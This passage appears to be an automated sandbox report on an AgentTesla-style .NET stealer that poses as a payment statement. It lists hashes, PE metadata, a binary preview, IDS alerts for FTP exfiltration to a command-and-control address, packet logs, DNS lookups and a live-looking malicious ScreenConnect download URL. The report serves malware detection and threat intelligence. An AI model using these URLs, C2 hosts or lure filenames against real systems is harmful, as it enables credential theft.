	Uviv7rEtnt.exe	Get hash	malicious	Stealc, Vidar	Browse	172.67.179.207

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
3b5074b1b5d032e5620f69f9f700ff0e	file.exe	Get hash	malicious	Stealc, Vidar	Browse	172.67.74.152
	Ndnownts.exe	Get hash	malicious	Snake Keylogger	Browse	172.67.74.152
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc	Browse	172.67.74.152
	https://docs.google.com/uc?export=download&id=1rG5XITnDsiVQCEMAfg1Ex3pDcYxrlv0N	Get hash	malicious	Unknown	Browse	172.67.74.152
	file.exe	Get hash	malicious	LummaC	Browse	172.67.74.152
	EVER ABILITY V66 PARTICULARS.pdf.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	172.67.74.152
	MV. NORDRHONE VSL's PARTICULARS.xlsx.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	172.67.74.152
	MUM - VESSEL'S PARTICULARS.pdf.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	172.67.74.152
	https://cp9856.chelokipotlester.icu/Bin/support.Client.exe?h=cp3back96.site&p=8041&k=BgIAAACkAABSU0ExAAgAAAEAAQB9zMUOcnsRaC12buOM5jB%2F0aQdWfMpUKDaWi13yRXoM16W00nLl4p0ZtEhANoxvmcw0wWFEBncKj1h1Sizr06d2epn5Y1la%2FZuAUNQxVB6zV6MkV%2FQ3PQ8O4IKEUzM%2B1uTT6bVi8cjhVOM7wlYYJcudQAB6Dwlh4JaUc5YEBvhT8MaZnAIYPqnbmxNwUw1RDlaRh5YJbZGPTJPIJpusdEO4D%2FCUtP6CZ%2F6LBYCi1k6apr4NFJdoCsgYMmz0ueWApW6fnSWePa0E3G6vxJQsjXUZXU7nn2pC9y84o5L0uqvKTZ239UPNomZv8wnSyaubzULL%2B48fuhT%2FYi9ukTBmorR&s=5999b697-2fc8-47f6-a1dc-4d0d274c363e&i=Untitled%20Session&e=Support&y=Guest&r=	Get hash	malicious	ScreenConnect Tool	Browse	172.67.74.152
	FW Complete with Docusign Remittance Advice .pdf.eml	Get hash	malicious	Unknown	Browse	172.67.74.152

Process:	C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	471040
Entropy (8bit):	7.432986539935041
Encrypted:	false
SSDEEP:	12288:5kbUgoa8QQGqCwwrgSsfCzSr5Kh4gC1ki0ngHU:5fg7AGewUizSFKCgC14nB
MD5:	A528109E5486419098353578BD5E662A
SHA1:	597C6324EB2796A81F13D91CD12124734790210C
SHA-256:	C5210DCAE2936CA5424A1224DDC519BDED76064115A95E58C722B69E96AC344C
SHA-512:	6E4063AD6BEB7F48539CC4590F8F61307CB3AD2415FE31D57919FBCC7E650EC9669108C2E55C474D09643064D550AAB6C2A903AE284E2A7A2C46B2258E166B73
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 58%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L... .................0..&...........E... ...`....@.. ....................................`.................................PE..K....`............................................................................... ............... ..H............text....%... ...&.................. ..`.rsrc........`.......(..............@..@.reloc..............................@..B.................E......H..........\............5...N.......................................... ...............................................%..?.@.$.(.).;.'...".(R.....sS.........s/........2r...p.(...+2.{....o_....(..........sJ........2r...p.(...+2.{....o_....se........2r...p.(...+2.{....o_....s.........2r7..p.(...+2.{....o_...&.(R.....".......".(m....Vs....(n...t............sx...}......(y..... ... ....sz...({.....r...po\|....j.(}.....(~....s....(.....Z......(....(....(....

C:\Users\user\AppData\Roaming\Adobe\adobe.exe:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Reputation:	high, very likely benign file
Preview:	[ZoneTransfer]....ZoneId=0

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.432986539935041
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.79% Win32 Executable (generic) a (10002005/4) 49.75% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Windows Screen Saver (13104/52) 0.07% Win16/32 Executable Delphi generic (2074/23) 0.01%
File name:	Statement JULY #U007e SEP 2024 USD 19,055.00.exe
File size:	471'040 bytes
MD5:	a528109e5486419098353578bd5e662a
SHA1:	597c6324eb2796a81f13d91cd12124734790210c
SHA256:	c5210dcae2936ca5424a1224ddc519bded76064115a95e58c722b69e96ac344c
SHA512:	6e4063ad6beb7f48539cc4590f8f61307cb3ad2415fe31d57919fbcc7e650ec9669108c2e55c474d09643064d550aab6c2a903ae284e2a7a2c46b2258e166b73
SSDEEP:	12288:5kbUgoa8QQGqCwwrgSsfCzSr5Kh4gC1ki0ngHU:5fg7AGewUizSFKCgC14nB
TLSH:	62A4CF24A7EC0722F6FF47BAF8B440029BB5F563EA57D39D699462F90422740C912B37
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L... .................0..&...........E... ...`....@.. ....................................`................................

File Icon


Icon Hash:	90cececece8e8eb0

Static PE Info

General

Entrypoint:	0x47459e
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0xEBF8C820 [Wed Jun 15 04:18:40 2095 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x74550	0x4b	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x76000	0x596	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x78000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x725a4	0x72600	a79d9fd3decd3592ac40f9c01a22cfcc	False	0.7419249487704918	data	7.447223065937859	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0x76000	0x596	0x600	d81d02459aad624e4c789650ba479e0d	False	0.4127604166666667	data	4.033174554489017	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x78000	0xc	0x200	c6f96c28013d066d7858ebe5f076c1f7	False	0.044921875	data	0.10191042566270775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_VERSION	0x760a0	0x30c	data			0.4269230769230769
RT_MANIFEST	0x763ac	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators			0.5489795918367347

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-10-30T05:28:58.978391+0100	2029927	ET MALWARE AgentTesla Exfil via FTP	1	192.168.2.4	49733	213.189.52.181	21	TCP
2024-10-30T05:28:59.734351+0100	2855542	ETPRO MALWARE Agent Tesla CnC Exfil Activity	1	192.168.2.4	49735	213.189.52.181	63514	TCP
2024-10-30T05:28:59.740198+0100	2855542	ETPRO MALWARE Agent Tesla CnC Exfil Activity	1	192.168.2.4	49735	213.189.52.181	63514	TCP
2024-10-30T05:29:13.059573+0100	2029927	ET MALWARE AgentTesla Exfil via FTP	1	192.168.2.4	49739	213.189.52.181	21	TCP
2024-10-30T05:29:13.819998+0100	2855542	ETPRO MALWARE Agent Tesla CnC Exfil Activity	1	192.168.2.4	49742	213.189.52.181	64246	TCP
2024-10-30T05:29:13.826345+0100	2855542	ETPRO MALWARE Agent Tesla CnC Exfil Activity	1	192.168.2.4	49742	213.189.52.181	64246	TCP
2024-10-30T05:29:22.514824+0100	2029927	ET MALWARE AgentTesla Exfil via FTP	1	192.168.2.4	49748	213.189.52.181	21	TCP
2024-10-30T05:29:23.264162+0100	2855542	ETPRO MALWARE Agent Tesla CnC Exfil Activity	1	192.168.2.4	49749	213.189.52.181	64747	TCP
2024-10-30T05:29:23.270198+0100	2855542	ETPRO MALWARE Agent Tesla CnC Exfil Activity	1	192.168.2.4	49749	213.189.52.181	64747	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 30, 2024 05:28:54.980757952 CET	49730	443	192.168.2.4	172.67.74.152
Oct 30, 2024 05:28:54.980817080 CET	443	49730	172.67.74.152	192.168.2.4
Oct 30, 2024 05:28:54.980882883 CET	49730	443	192.168.2.4	172.67.74.152
Oct 30, 2024 05:28:54.992459059 CET	49730	443	192.168.2.4	172.67.74.152
Oct 30, 2024 05:28:54.992513895 CET	443	49730	172.67.74.152	192.168.2.4
Oct 30, 2024 05:28:55.606791973 CET	443	49730	172.67.74.152	192.168.2.4
Oct 30, 2024 05:28:55.606874943 CET	49730	443	192.168.2.4	172.67.74.152
Oct 30, 2024 05:28:55.610490084 CET	49730	443	192.168.2.4	172.67.74.152
Oct 30, 2024 05:28:55.610505104 CET	443	49730	172.67.74.152	192.168.2.4
Oct 30, 2024 05:28:55.610713959 CET	443	49730	172.67.74.152	192.168.2.4
Oct 30, 2024 05:28:55.657433033 CET	49730	443	192.168.2.4	172.67.74.152
Oct 30, 2024 05:28:55.663422108 CET	49730	443	192.168.2.4	172.67.74.152
Oct 30, 2024 05:28:55.711324930 CET	443	49730	172.67.74.152	192.168.2.4
Oct 30, 2024 05:28:55.845263004 CET	443	49730	172.67.74.152	192.168.2.4
Oct 30, 2024 05:28:55.845340014 CET	443	49730	172.67.74.152	192.168.2.4
Oct 30, 2024 05:28:55.845453978 CET	49730	443	192.168.2.4	172.67.74.152
Oct 30, 2024 05:28:55.854125977 CET	49730	443	192.168.2.4	172.67.74.152
Oct 30, 2024 05:28:56.563148975 CET	49733	21	192.168.2.4	213.189.52.181
Oct 30, 2024 05:28:56.568541050 CET	21	49733	213.189.52.181	192.168.2.4
Oct 30, 2024 05:28:56.568648100 CET	49733	21	192.168.2.4	213.189.52.181
Oct 30, 2024 05:28:57.324274063 CET	21	49733	213.189.52.181	192.168.2.4
Oct 30, 2024 05:28:57.324632883 CET	49733	21	192.168.2.4	213.189.52.181
Oct 30, 2024 05:28:57.330034971 CET	21	49733	213.189.52.181	192.168.2.4
Oct 30, 2024 05:28:57.585655928 CET	21	49733	213.189.52.181	192.168.2.4
Oct 30, 2024 05:28:57.586002111 CET	49733	21	192.168.2.4	213.189.52.181
Oct 30, 2024 05:28:57.591492891 CET	21	49733	213.189.52.181	192.168.2.4
Oct 30, 2024 05:28:57.916445017 CET	21	49733	213.189.52.181	192.168.2.4
Oct 30, 2024 05:28:57.921746016 CET	49733	21	192.168.2.4	213.189.52.181
Oct 30, 2024 05:28:57.927292109 CET	21	49733	213.189.52.181	192.168.2.4
Oct 30, 2024 05:28:58.183074951 CET	21	49733	213.189.52.181	192.168.2.4
Oct 30, 2024 05:28:58.185724020 CET	49733	21	192.168.2.4	213.189.52.181
Oct 30, 2024 05:28:58.191337109 CET	21	49733	213.189.52.181	192.168.2.4
Oct 30, 2024 05:28:58.447448015 CET	21	49733	213.189.52.181	192.168.2.4
Oct 30, 2024 05:28:58.447632074 CET	49733	21	192.168.2.4	213.189.52.181
Oct 30, 2024 05:28:58.453613997 CET	21	49733	213.189.52.181	192.168.2.4
Oct 30, 2024 05:28:58.709135056 CET	21	49733	213.189.52.181	192.168.2.4
Oct 30, 2024 05:28:58.709364891 CET	49733	21	192.168.2.4	213.189.52.181
Oct 30, 2024 05:28:58.715336084 CET	21	49733	213.189.52.181	192.168.2.4
Oct 30, 2024 05:28:58.971010923 CET	21	49733	213.189.52.181	192.168.2.4
Oct 30, 2024 05:28:58.971776009 CET	49735	63514	192.168.2.4	213.189.52.181
Oct 30, 2024 05:28:58.978179932 CET	63514	49735	213.189.52.181	192.168.2.4
Oct 30, 2024 05:28:58.978271961 CET	49735	63514	192.168.2.4	213.189.52.181
Oct 30, 2024 05:28:58.978390932 CET	49733	21	192.168.2.4	213.189.52.181
Oct 30, 2024 05:28:58.983769894 CET	21	49733	213.189.52.181	192.168.2.4
Oct 30, 2024 05:28:59.733849049 CET	21	49733	213.189.52.181	192.168.2.4
Oct 30, 2024 05:28:59.734350920 CET	49735	63514	192.168.2.4	213.189.52.181
Oct 30, 2024 05:28:59.734350920 CET	49735	63514	192.168.2.4	213.189.52.181
Oct 30, 2024 05:28:59.739787102 CET	63514	49735	213.189.52.181	192.168.2.4
Oct 30, 2024 05:28:59.740139961 CET	63514	49735	213.189.52.181	192.168.2.4
Oct 30, 2024 05:28:59.740197897 CET	49735	63514	192.168.2.4	213.189.52.181
Oct 30, 2024 05:28:59.782622099 CET	49733	21	192.168.2.4	213.189.52.181
Oct 30, 2024 05:28:59.997594118 CET	21	49733	213.189.52.181	192.168.2.4
Oct 30, 2024 05:29:00.048086882 CET	49733	21	192.168.2.4	213.189.52.181
Oct 30, 2024 05:29:09.355942011 CET	49738	443	192.168.2.4	172.67.74.152
Oct 30, 2024 05:29:09.355993986 CET	443	49738	172.67.74.152	192.168.2.4
Oct 30, 2024 05:29:09.356075048 CET	49738	443	192.168.2.4	172.67.74.152
Oct 30, 2024 05:29:09.359735966 CET	49738	443	192.168.2.4	172.67.74.152
Oct 30, 2024 05:29:09.359745026 CET	443	49738	172.67.74.152	192.168.2.4
Oct 30, 2024 05:29:09.968301058 CET	443	49738	172.67.74.152	192.168.2.4
Oct 30, 2024 05:29:09.968405008 CET	49738	443	192.168.2.4	172.67.74.152
Oct 30, 2024 05:29:09.970379114 CET	49738	443	192.168.2.4	172.67.74.152
Oct 30, 2024 05:29:09.970387936 CET	443	49738	172.67.74.152	192.168.2.4
Oct 30, 2024 05:29:09.970630884 CET	443	49738	172.67.74.152	192.168.2.4
Oct 30, 2024 05:29:10.016882896 CET	49738	443	192.168.2.4	172.67.74.152
Oct 30, 2024 05:29:10.046175003 CET	49738	443	192.168.2.4	172.67.74.152
Oct 30, 2024 05:29:10.087343931 CET	443	49738	172.67.74.152	192.168.2.4
Oct 30, 2024 05:29:10.221271992 CET	443	49738	172.67.74.152	192.168.2.4
Oct 30, 2024 05:29:10.221343040 CET	443	49738	172.67.74.152	192.168.2.4
Oct 30, 2024 05:29:10.221421003 CET	49738	443	192.168.2.4	172.67.74.152
Oct 30, 2024 05:29:10.224266052 CET	49738	443	192.168.2.4	172.67.74.152
Oct 30, 2024 05:29:10.661974907 CET	49739	21	192.168.2.4	213.189.52.181
Oct 30, 2024 05:29:10.667516947 CET	21	49739	213.189.52.181	192.168.2.4
Oct 30, 2024 05:29:10.667781115 CET	49739	21	192.168.2.4	213.189.52.181
Oct 30, 2024 05:29:11.418526888 CET	21	49739	213.189.52.181	192.168.2.4
Oct 30, 2024 05:29:11.425230026 CET	49739	21	192.168.2.4	213.189.52.181
Oct 30, 2024 05:29:11.430700064 CET	21	49739	213.189.52.181	192.168.2.4
Oct 30, 2024 05:29:11.684963942 CET	21	49739	213.189.52.181	192.168.2.4
Oct 30, 2024 05:29:11.685108900 CET	49739	21	192.168.2.4	213.189.52.181
Oct 30, 2024 05:29:11.691416025 CET	21	49739	213.189.52.181	192.168.2.4
Oct 30, 2024 05:29:12.016350985 CET	21	49739	213.189.52.181	192.168.2.4
Oct 30, 2024 05:29:12.016560078 CET	49739	21	192.168.2.4	213.189.52.181
Oct 30, 2024 05:29:12.021935940 CET	21	49739	213.189.52.181	192.168.2.4
Oct 30, 2024 05:29:12.275110006 CET	21	49739	213.189.52.181	192.168.2.4
Oct 30, 2024 05:29:12.275356054 CET	49739	21	192.168.2.4	213.189.52.181
Oct 30, 2024 05:29:12.280774117 CET	21	49739	213.189.52.181	192.168.2.4
Oct 30, 2024 05:29:12.534187078 CET	21	49739	213.189.52.181	192.168.2.4
Oct 30, 2024 05:29:12.534358978 CET	49739	21	192.168.2.4	213.189.52.181
Oct 30, 2024 05:29:12.540035963 CET	21	49739	213.189.52.181	192.168.2.4
Oct 30, 2024 05:29:12.794436932 CET	21	49739	213.189.52.181	192.168.2.4
Oct 30, 2024 05:29:12.794589996 CET	49739	21	192.168.2.4	213.189.52.181
Oct 30, 2024 05:29:12.800048113 CET	21	49739	213.189.52.181	192.168.2.4
Oct 30, 2024 05:29:13.053359032 CET	21	49739	213.189.52.181	192.168.2.4
Oct 30, 2024 05:29:13.054037094 CET	49742	64246	192.168.2.4	213.189.52.181
Oct 30, 2024 05:29:13.059432030 CET	64246	49742	213.189.52.181	192.168.2.4
Oct 30, 2024 05:29:13.059504986 CET	49742	64246	192.168.2.4	213.189.52.181
Oct 30, 2024 05:29:13.059572935 CET	49739	21	192.168.2.4	213.189.52.181
Oct 30, 2024 05:29:13.065994978 CET	21	49739	213.189.52.181	192.168.2.4
Oct 30, 2024 05:29:13.813601971 CET	21	49739	213.189.52.181	192.168.2.4
Oct 30, 2024 05:29:13.819998026 CET	49742	64246	192.168.2.4	213.189.52.181
Oct 30, 2024 05:29:13.820195913 CET	49742	64246	192.168.2.4	213.189.52.181
Oct 30, 2024 05:29:13.825453043 CET	64246	49742	213.189.52.181	192.168.2.4
Oct 30, 2024 05:29:13.826294899 CET	64246	49742	213.189.52.181	192.168.2.4
Oct 30, 2024 05:29:13.826344967 CET	49742	64246	192.168.2.4	213.189.52.181
Oct 30, 2024 05:29:13.860621929 CET	49739	21	192.168.2.4	213.189.52.181
Oct 30, 2024 05:29:14.081770897 CET	21	49739	213.189.52.181	192.168.2.4
Oct 30, 2024 05:29:14.126247883 CET	49739	21	192.168.2.4	213.189.52.181
Oct 30, 2024 05:29:18.201704025 CET	49747	443	192.168.2.4	172.67.74.152
Oct 30, 2024 05:29:18.201750994 CET	443	49747	172.67.74.152	192.168.2.4
Oct 30, 2024 05:29:18.201812983 CET	49747	443	192.168.2.4	172.67.74.152
Oct 30, 2024 05:29:18.230106115 CET	49747	443	192.168.2.4	172.67.74.152
Oct 30, 2024 05:29:18.230123997 CET	443	49747	172.67.74.152	192.168.2.4
Oct 30, 2024 05:29:18.837248087 CET	443	49747	172.67.74.152	192.168.2.4
Oct 30, 2024 05:29:18.837518930 CET	49747	443	192.168.2.4	172.67.74.152
Oct 30, 2024 05:29:18.841520071 CET	49747	443	192.168.2.4	172.67.74.152
Oct 30, 2024 05:29:18.841530085 CET	443	49747	172.67.74.152	192.168.2.4
Oct 30, 2024 05:29:18.841778994 CET	443	49747	172.67.74.152	192.168.2.4
Oct 30, 2024 05:29:18.889039040 CET	49747	443	192.168.2.4	172.67.74.152
Oct 30, 2024 05:29:18.935337067 CET	443	49747	172.67.74.152	192.168.2.4
Oct 30, 2024 05:29:18.963211060 CET	49739	21	192.168.2.4	213.189.52.181
Oct 30, 2024 05:29:19.066318989 CET	443	49747	172.67.74.152	192.168.2.4
Oct 30, 2024 05:29:19.066382885 CET	443	49747	172.67.74.152	192.168.2.4
Oct 30, 2024 05:29:19.066487074 CET	49747	443	192.168.2.4	172.67.74.152
Oct 30, 2024 05:29:19.069016933 CET	49747	443	192.168.2.4	172.67.74.152
Oct 30, 2024 05:29:20.144963980 CET	49748	21	192.168.2.4	213.189.52.181
Oct 30, 2024 05:29:20.150758028 CET	21	49748	213.189.52.181	192.168.2.4
Oct 30, 2024 05:29:20.150861025 CET	49748	21	192.168.2.4	213.189.52.181
Oct 30, 2024 05:29:20.890022039 CET	21	49748	213.189.52.181	192.168.2.4
Oct 30, 2024 05:29:20.890248060 CET	49748	21	192.168.2.4	213.189.52.181
Oct 30, 2024 05:29:20.895761967 CET	21	49748	213.189.52.181	192.168.2.4
Oct 30, 2024 05:29:21.146019936 CET	21	49748	213.189.52.181	192.168.2.4
Oct 30, 2024 05:29:21.146197081 CET	49748	21	192.168.2.4	213.189.52.181
Oct 30, 2024 05:29:21.151570082 CET	21	49748	213.189.52.181	192.168.2.4
Oct 30, 2024 05:29:21.474503040 CET	21	49748	213.189.52.181	192.168.2.4
Oct 30, 2024 05:29:21.477684975 CET	49748	21	192.168.2.4	213.189.52.181
Oct 30, 2024 05:29:21.483114004 CET	21	49748	213.189.52.181	192.168.2.4
Oct 30, 2024 05:29:21.735243082 CET	21	49748	213.189.52.181	192.168.2.4
Oct 30, 2024 05:29:21.735892057 CET	49748	21	192.168.2.4	213.189.52.181
Oct 30, 2024 05:29:21.741338968 CET	21	49748	213.189.52.181	192.168.2.4
Oct 30, 2024 05:29:21.991244078 CET	21	49748	213.189.52.181	192.168.2.4
Oct 30, 2024 05:29:21.991503000 CET	49748	21	192.168.2.4	213.189.52.181
Oct 30, 2024 05:29:21.996931076 CET	21	49748	213.189.52.181	192.168.2.4
Oct 30, 2024 05:29:22.247018099 CET	21	49748	213.189.52.181	192.168.2.4
Oct 30, 2024 05:29:22.247889042 CET	49748	21	192.168.2.4	213.189.52.181
Oct 30, 2024 05:29:22.253315926 CET	21	49748	213.189.52.181	192.168.2.4
Oct 30, 2024 05:29:22.503412962 CET	21	49748	213.189.52.181	192.168.2.4
Oct 30, 2024 05:29:22.506592989 CET	49749	64747	192.168.2.4	213.189.52.181
Oct 30, 2024 05:29:22.512080908 CET	64747	49749	213.189.52.181	192.168.2.4
Oct 30, 2024 05:29:22.512172937 CET	49749	64747	192.168.2.4	213.189.52.181
Oct 30, 2024 05:29:22.514823914 CET	49748	21	192.168.2.4	213.189.52.181
Oct 30, 2024 05:29:22.520215988 CET	21	49748	213.189.52.181	192.168.2.4
Oct 30, 2024 05:29:23.263711929 CET	21	49748	213.189.52.181	192.168.2.4
Oct 30, 2024 05:29:23.264162064 CET	49749	64747	192.168.2.4	213.189.52.181
Oct 30, 2024 05:29:23.264162064 CET	49749	64747	192.168.2.4	213.189.52.181
Oct 30, 2024 05:29:23.269560099 CET	64747	49749	213.189.52.181	192.168.2.4
Oct 30, 2024 05:29:23.270127058 CET	64747	49749	213.189.52.181	192.168.2.4
Oct 30, 2024 05:29:23.270198107 CET	49749	64747	192.168.2.4	213.189.52.181
Oct 30, 2024 05:29:23.313762903 CET	49748	21	192.168.2.4	213.189.52.181
Oct 30, 2024 05:29:23.525142908 CET	21	49748	213.189.52.181	192.168.2.4
Oct 30, 2024 05:29:23.579511881 CET	49748	21	192.168.2.4	213.189.52.181
Oct 30, 2024 05:30:24.753387928 CET	49733	21	192.168.2.4	213.189.52.181
Oct 30, 2024 05:30:24.758919954 CET	21	49733	213.189.52.181	192.168.2.4
Oct 30, 2024 05:30:25.014439106 CET	21	49733	213.189.52.181	192.168.2.4
Oct 30, 2024 05:30:25.021158934 CET	49900	63829	192.168.2.4	213.189.52.181
Oct 30, 2024 05:30:25.026643038 CET	63829	49900	213.189.52.181	192.168.2.4
Oct 30, 2024 05:30:25.028970003 CET	49900	63829	192.168.2.4	213.189.52.181
Oct 30, 2024 05:30:25.029051065 CET	49733	21	192.168.2.4	213.189.52.181
Oct 30, 2024 05:30:25.034441948 CET	21	49733	213.189.52.181	192.168.2.4
Oct 30, 2024 05:30:25.807862043 CET	21	49733	213.189.52.181	192.168.2.4
Oct 30, 2024 05:30:25.808109999 CET	49900	63829	192.168.2.4	213.189.52.181
Oct 30, 2024 05:30:25.808155060 CET	49900	63829	192.168.2.4	213.189.52.181
Oct 30, 2024 05:30:25.813513994 CET	63829	49900	213.189.52.181	192.168.2.4
Oct 30, 2024 05:30:25.814093113 CET	63829	49900	213.189.52.181	192.168.2.4
Oct 30, 2024 05:30:25.814148903 CET	49900	63829	192.168.2.4	213.189.52.181
Oct 30, 2024 05:30:25.860781908 CET	49733	21	192.168.2.4	213.189.52.181
Oct 30, 2024 05:30:26.080961943 CET	21	49733	213.189.52.181	192.168.2.4
Oct 30, 2024 05:30:26.126400948 CET	49733	21	192.168.2.4	213.189.52.181

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 30, 2024 05:28:54.965456963 CET	64401	53	192.168.2.4	1.1.1.1
Oct 30, 2024 05:28:54.973469973 CET	53	64401	1.1.1.1	192.168.2.4
Oct 30, 2024 05:28:56.553451061 CET	49400	53	192.168.2.4	1.1.1.1
Oct 30, 2024 05:28:56.562475920 CET	53	49400	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Oct 30, 2024 05:28:54.965456963 CET	192.168.2.4	1.1.1.1	0x3ce5	Standard query (0)	api.ipify.org	A (IP address)	IN (0x0001)	false
Oct 30, 2024 05:28:56.553451061 CET	192.168.2.4	1.1.1.1	0xf14f	Standard query (0)	s4.serv00.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Oct 30, 2024 05:28:54.973469973 CET	1.1.1.1	192.168.2.4	0x3ce5	No error (0)	api.ipify.org	172.67.74.152	A (IP address)	IN (0x0001)	false
Oct 30, 2024 05:28:54.973469973 CET	1.1.1.1	192.168.2.4	0x3ce5	No error (0)	api.ipify.org	104.26.12.205	A (IP address)	IN (0x0001)	false
